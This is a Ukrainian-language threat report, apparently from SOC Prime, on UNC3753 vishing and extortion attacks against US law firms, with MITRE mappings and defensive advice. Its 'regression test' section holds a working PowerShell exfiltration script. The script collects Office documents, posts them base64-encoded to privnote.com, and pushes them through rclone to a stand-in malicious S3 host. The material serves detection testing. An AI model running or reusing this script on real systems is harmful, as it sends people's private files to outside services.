Консультація шукає: Триваючі цілеспрямовані атаки на юридичні фірми США

SOC Prime Team

Стежити

Консультація шукає: Триваючі цілеспрямовані атаки на юридичні фірми США

Detection stack

AIDR
Alert
ETL
Query

Звіт про загрози
Потік атаки
Виявлення
Симуляції

Резюме

Кластер загроз, що діє з фінансових мотивів та відомий як UNC3753, проводить вішинг-кампанії, які обманюють жертв, змушуючи їх встановлювати програмне забезпечення для віддаленого моніторингу та управління. Після встановлення доступу, актори крадуть конфіденційну юридичну та фінансову інформацію, а потім шантажують організацію жертви, погрожуючи публічним викриттям. Кампанія зосереджена на фірмах зі сфери професійних послуг США, зокрема на юридичних фірмах, та може включати як кіберзлочини, так і фізичне викрадення даних.

Розслідування

Mandiant спостерігала за повним циклом проникнення — від початкового голосового фішингу до крадіжки даних і шантажу, іноді протягом одного робочого дня. Жертви були переконані використовувати інструменти для спільного доступу до екрану та RMM програмне забезпечення, таке як AnyDesk, Bomgar або спеціальний інсталятор SuperOps, наданий за допомогою команди curl Дані виводилися за допомогою інструментів, таких як WinSCP, Rclone або прямі завантаження на комерційні облікові записи хмарного зберігання файлів користувачів.

Запобіжні заходи

Організації повинні навчати персонал розпізнавати вішинг-атаки, застосовувати суворі процедури перевірки для будь-яких запитів на віддалену підтримку та блокувати несанкціоновані RMM та інструменти для спільного доступу до екрану. Відключення зовнішніх носіїв, моніторинг незвичних вихідних передач у хмарні сховища або FTP-ресурси, застосування умовного доступу до VDI та забезпечення багатофакторної автентифікації для критичних репозиторіїв документів можуть додатково знижувати ризики.

Реагування

Якщо ця активність виявлена, негайно ізолюйте уражену кінцеву точку, припиніть будь-які несанкціоновані віддалені сесії та видаліть встановлені бінарники RMM. Слідчі повинні зібрати історію командного рядка, зміни в реєстрі та арефакти запланованих завдань для судово-медичного огляду. Компрометовані облікові дані повинні бути скинуті, потрібно оцінити витік даних, а залучення правоохоронних органів слід розглянути, якщо почався шантаж.

"graph TB %% Визначення класів classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccccff classDef operator fill:#ff9900 %% Визначення вузлів initial_access["Дія – T1566.004 Фішинг: Озвучений фішинг Опис: Зловмисник використовує переконливу голосову розмову, щоб обманом змусити ціль надати облікові дані або виконати шкідливі команди."] class initial_access action user_execution["Дія – T1204.002 Шкідливий файл Інструмент: cURL + MSI інсталятор Опис: Жертва запускає шкідливий MSI файл, завантажений через cURL, що призводить до виконання коду в системі."] class user_execution action remote_desktop["Дія – T1219.002 Програмне забезпечення для віддаленого робочого столу Інструменти: Zoom, Microsoft Teams, AnyDesk Опис: Легітимні програми для віддаленого робочого столу та онлайн-зустрічей використовуються для підтримання стійкого віддаленого доступу."] class remote_desktop action discovery["Дія – T1083 Виявлення файлів і директорій & T1680 Виявення локального зберігання Опис: Зловмисник перераховує файли, директорії та місця локального зберігання для пошуку цінних даних для виводу."] class discovery action data_staging["Дія – T1074 Підготовка даних & T1560 Архівування зібраних даних Опис: Зібрані файли локально підготовлюються та архівуються для підготовки до виводу."] class data_staging action exfiltration["Дія – T1567.002 Вивід у хмарне сховище & T1020 Автоматизований вивід Ціль: Google Drive Опис: Автоматизоване завантаження підготовлених архівів у сервіс хмарного зберігання для віддаленого вилучення."] class exfiltration action physical_media["Дія – T1052 Вивід через фізичний носій Опис: Передача даних на знімні носії для автономного виводу у випадках обмеження мережевих каналів."] class physical_media action cleanup["Дія – T1070.001 Очищення журналів подій Windows Опис: Видалення журналів подій Windows для стирання доказів проникнення."] class cleanup action %% З’єднання вузлів initial_access –>|веде до| user_execution user_execution –>|вмикає| remote_desktop remote_desktop –>|вмикає| discovery discovery –>|веде до| data_staging data_staging –>|вмикає| exfiltration exfiltration –>|веде до| physical_media physical_media –>|слідує за| cleanup "

Потік атаки

Оповідь атаки та команди:
1. Розвідка та підготовка даних (T1005, T1083):
  Зловмисник перераховує каталоги користувачів і копіює всі *.docx and *.xlsx файли в папку для підготовки C:TempStagedData.
2. Завантаження за допомогою Privnote (T1567.002):
  Використовуючи PowerShell, зловмисник читає кожен файл, кодує вміст у base-64 та надсилає до https://privnote.com/api/note. Командний рядок містить URL-адресу, яка відповідає selection_privnote умові.
3. Передача з Rclone (T1020):
  Зловмисник запускає rclone.exe (завантажений на вимогу) для передачі підготовлених файлів у шкідливе сховище S3. Ім’я процесу “rclone.exe” відповідає selection_tool.
4. Очищення: Видалити папку для підготовки та будь-які залишкові бінарні файли.

Скрипт для регресійного тестування: (PowerShell – автономний, без зовнішніх залежностей, окрім Invoke-WebRequest.)

# -------------------------------------------------
# Емуляція виведення UNC3753 – PowerShell
# -------------------------------------------------
# 1. Підготувати каталог для підготовки
$staging = "$env:USERPROFILETempStagedData"
New-Item -ItemType Directory -Force -Path $staging | Out-Null

# 2. Копіювати вибіркові дані (емуляція збирання даних)
Get-ChildItem -Path "$env:USERPROFILEDocuments" -Include *.docx, *.xlsx -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object { Copy-Item -Path $_.FullName -Destination $staging -Force }

# 3. Завантажити кожен файл на Privnote (веб-служба для виведення)
$privnoteUrl = "https://privnote.com/api/note"
Get-ChildItem -Path $staging -File | ForEach-Object {
    $content = [Convert]::ToBase64String([IO.File]::ReadAllBytes($_.FullName))
    $body = @{ text = $content }
    # URL з'являється у командному рядку -> спрацьовує selection_privnote
    Invoke-WebRequest -Uri $privnoteUrl -Method POST -Body $body -UseBasicParsing | Out-Null
}

# 4. Завантажити Rclone (якщо не встановлено) і виконати виведення через S3
$rcloneExe = "$env:TEMPrclone.exe"
if (-not (Test-Path $rcloneExe)) {
    Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "$env:TEMPrclone.zip"
    Expand-Archive -Path "$env:TEMPrclone.zip" -DestinationPath $env:TEMP -Force
    Move-Item -Path (Get-ChildItem "$env:TEMPrclone-*-windows-amd64rclone.exe").FullName -Destination $rcloneExe -Force
}

# Налаштувати віддалене (шкідливе) сховище S3 – конфігурація записується у тимчасовий файл
$rcloneConfig = @"
[malicious
type = s3
provider = AWS
access_key_id = AKIAFAKEKEY
secret_access_key = fakeSecretKey123
region = us-east-1
endpoint = https://malicious-s3.example.com
"@
$configPath = "$env:TEMPrclone.conf"
$rcloneConfig | Set-Content -Path $configPath -Encoding ASCII

# Виконати rclone copy – ім'я процесу "rclone.exe" спрацьовує selection_tool
& $rcloneExe copy $staging "malicious:exfil" --config $configPath --log-level INFO

# 5. Очищення
Remove-Item -Recurse -Force $staging
Remove-Item -Force $rcloneExe, $configPath

Команди для очищення:

# Завершити будь-які залишкові процеси WinSCP або Rclone
Get-Process -Name WinSCP, rclone -ErrorAction SilentlyContinue | Stop-Process -Force

# Видалити залишкові тимчасові файли (якщо є)
Remove-Item -Path "$env:TEMPWinSCP.exe","$env:TEMPWinSCP.zip","$env:TEMPrclone.zip","$env:TEMPrclone-*-windows-amd64" -Recurse -Force -ErrorAction SilentlyContinue

Кінець звіту

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно